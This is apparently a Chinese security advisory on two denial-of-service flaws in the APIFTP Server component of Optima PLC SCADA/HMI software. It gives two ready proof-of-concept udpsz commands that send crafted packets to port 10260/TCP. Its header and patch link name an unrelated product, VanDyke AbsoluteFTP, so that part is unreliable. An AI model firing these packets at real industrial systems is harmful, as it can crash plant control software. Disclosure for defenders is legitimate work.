受影响系统：
VanDyke AbsoluteFTP 2.x
描述：
Optima是一套通过SCADA/HMI界面控制PLC的自动软件。APIFTP Server是共享文件夹中的远程文件的文件服务器。
Optima PLC中存在两个安全漏洞，可被恶意用户利用造成拒绝服务。
1）处理 APIFTP Server (APIFTPServer.exe) 中的某些报文时的错误可被利用重复触发空指针引用，通过发送到端口10260/TCP的特制报文导致栈溢出；
2）处理 APIFTP Server (APIFTPServer.exe) 中的某些报文时的错误可被利用通过发送到端口10260/TCP的特制报文造成无限循环。
<*来源：Luigi Auriemma （aluigi@pivx.com）
链接：http://aluigi.altervista.org/adv/optimalog_1-adv.txt
*>
测试方法：

Luigi Auriemma （aluigi@pivx.com）提供了如下测试方法：

http://aluigi.org/testz/udpsz.zip

A]
udpsz -C “e803 0400 ff” -T -D -3 -d SERVER 10260 0×107

wait some seconds, the tool will quit automatically

B]
udpsz -C “e803 0400 00″ -T -D SERVER 10260 -1

建议：
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
www.vandyke.com/products/absoluteftp/